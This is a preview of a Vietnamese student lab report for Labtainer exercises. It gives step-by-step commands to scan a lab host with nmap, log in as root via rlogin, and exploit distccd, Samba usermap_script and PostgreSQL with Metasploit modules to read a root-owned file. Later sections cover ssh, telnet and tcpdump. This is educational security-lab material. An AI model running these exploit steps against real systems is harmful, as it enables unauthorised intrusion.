Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (3.73 MB, 12 trang )
<span class="text_page_counter">Trang 1</span><div class="page_container" data-page="1">
<b>Bài 1: Khai thác lỗ hổng dịch vụ sử dụng Metasploit</b>
<small>Bước 1: labtainer -r metasploit</small>
<small> Bước 2: </small>ifconfig
</div><span class="text_page_counter">Trang 2</span><div class="page_container" data-page="2"><small>Bước 3: Kiểm tra kết nối bằng ping</small>
<small>Bước 4: Quét các dịch vụ có thể tấn công: nmap -p0-65535 192.168.1.2</small>
</div><span class="text_page_counter">Trang 3</span><div class="page_container" data-page="3"><small>Bước 5: Khai thác dịch vụ cổng 513: rlogin -l root 192.168.1.2</small>
</div><span class="text_page_counter">Trang 4</span><div class="page_container" data-page="4"><small>-Trên terminal gõ: “sudo msfconsole”</small>
<small>-Tìm và tấn công dịch vụ distccd: </small><i>search distccd</i>
<small>-Sử dụng công cụ khai thác: use exploit/unix/misc/distcc_exec</small>
</div><span class="text_page_counter">Trang 5</span><div class="page_container" data-page="5"><i>- Xem cấu hình liên quan đến exploit: options</i>
<i>- Đặt RHOST: set RHOST 192.168.1.2</i>
</div><span class="text_page_counter">Trang 6</span><div class="page_container" data-page="6">- Khai thác lỗ hổng: exploit
- Đọc file <i>: cat /root/filetoview.txt</i>
</div><span class="text_page_counter">Trang 7</span><div class="page_container" data-page="7">Bước 8: Khai thác lỗ hổng IRC daemon (cổng 6667): Các bước thực hiện tương
Bước 10: Khai thác dịch vụ Samba service (cổng 139):
<i> “sudo msfconsole” -> search usermap_script-></i>
<i>->set RHOST 192.168.1.2->exploit->cat /root/filetoview.txt</i>
Bước 12: Khai thác dịch vụ Postgres (cổng 5432):
</div><span class="text_page_counter">Trang 8</span><div class="page_container" data-page="8"><i> “sudo msfconsole” -> search postgres_payload->use exploit/linux/postgres/postgres_payload->set RHOST 192.168.1.2->exploit</i>
<i>->cat /root/filetoview.txt</i>
<i>Bước 13: Kết thúc bài lab: stoplab metasploit</i>
<b>Bài 4: Phát hiện các lỗ hổng bảo mật sử dụng công cụ rà quétBước 1: </b>Xác định IP của máy
<b>Bước 2: Trên máy khách </b><i><b>mycomputer </b></i>sử dụng nmap để tìm ra địa chỉ IP của
</div><span class="text_page_counter">Trang 9</span><div class="page_container" data-page="9"><i><b>nmap để tìm cổng dịch vụ đang mở trên máy friedshrimp biết rằng cổng (port) </b></i>
nằm từ 2000-3000.
<b>Bước 3: Sau khi xác định được cổng ssh đang mở. Sử dụng ssh để truy cập vào </b>
máy chủ. Tên máy chủ và mật khẩu là: ubuntu.
</div><span class="text_page_counter">Trang 10</span><div class="page_container" data-page="10">Bước 4: <i><b>Sau khi truy cập được vào máy chủ friedshrimp đi tìm file</b></i>
friedshrimp.txt. Mở và đọc file.
Bước 5: Kết thúc bài lab:<small> stoplab nmap-discovery</small>
<b>Bài 9: Sử dụng công cụ truy cập từ xa</b>
</div><span class="text_page_counter">Trang 11</span><div class="page_container" data-page="11"><b>Bước 1: </b>Xác định IP của các máy
<b>Bước 2: </b>Trên máy khách sử dụng telnet để kết nối với máy chủ thông qua địa chỉ IP
<b>Bước 3: </b>Sau khi đăng nhập vào máy chủ, thực hiện việc đọc tệp có sẵn chứa đoạn mật mã
</div><span class="text_page_counter">Trang 12</span><div class="page_container" data-page="12"><b>Bước 4: </b>Trên server, chạy tcpdump để hiển thị lưu lượng mạng TCP và Thực hiện ssh từ máy khách vào máy chủ và đọc dữ liệu trên máy chủ
<i>Bước 5: Kết thúc bài lab: stoplab telnetlab</i>
</div>